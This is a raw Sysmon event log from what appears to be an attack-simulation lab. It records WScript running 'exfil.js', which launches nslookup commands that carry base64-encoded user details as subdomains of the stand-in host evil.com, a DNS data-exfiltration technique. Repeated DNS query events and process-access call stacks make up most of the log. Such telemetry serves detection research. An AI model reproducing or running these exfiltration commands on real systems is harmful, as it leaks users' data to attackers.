14:21:50.962{2E1864BB-18FE-629A-4E46-000000005F02}5988C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlaelzov.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.953{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleyaa.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-18FE-629A-4C46-000000005F02}80725104C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4D46-000000005F02}7944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215498Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215497Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215496Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215495Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4D46-000000005F02}7944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215494Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.922{2E1864BB-18FE-629A-4B46-000000005F02}79366068C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-4D46-000000005F02}7944C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.929{2E1864BB-18FE-629A-4D46-000000005F02}7944C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-4B46-000000005F02}7936C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleyaa.tmp 2>&1 22542200x8000000000000000215492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.769{00000000-0000-0000-0000-000000000000}2560evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.696{00000000-0000-0000-0000-000000000000}3292evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.607{00000000-0000-0000-0000-000000000000}6496evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.540{00000000-0000-0000-0000-000000000000}4672evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.458{00000000-0000-0000-0000-000000000000}6092evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.352{00000000-0000-0000-0000-000000000000}6028evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.261{00000000-0000-0000-0000-000000000000}1692evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.195{00000000-0000-0000-0000-000000000000}5060evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.123{00000000-0000-0000-0000-000000000000}1104evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000215483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:49.044{00000000-0000-0000-0000-000000000000}7172evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000215482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.904{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4C46-000000005F02}8072C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.904{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-4C46-000000005F02}8072C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.884{2E1864BB-18FE-629A-4C46-000000005F02}80725104C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4B46-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4C46-000000005F02}8072C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4B46-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.869{2E1864BB-18E0-629A-6742-000000005F02}39764992C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-4B46-000000005F02}7936C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.870{2E1864BB-18FE-629A-4B46-000000005F02}7936C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleyaa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.852{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlopcph.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-18FE-629A-4946-000000005F02}33647404C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-4A46-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-4A46-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.821{2E1864BB-18FE-629A-4846-000000005F02}77963396C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-4A46-000000005F02}7280C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.823{2E1864BB-18FE-629A-4A46-000000005F02}7280C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A 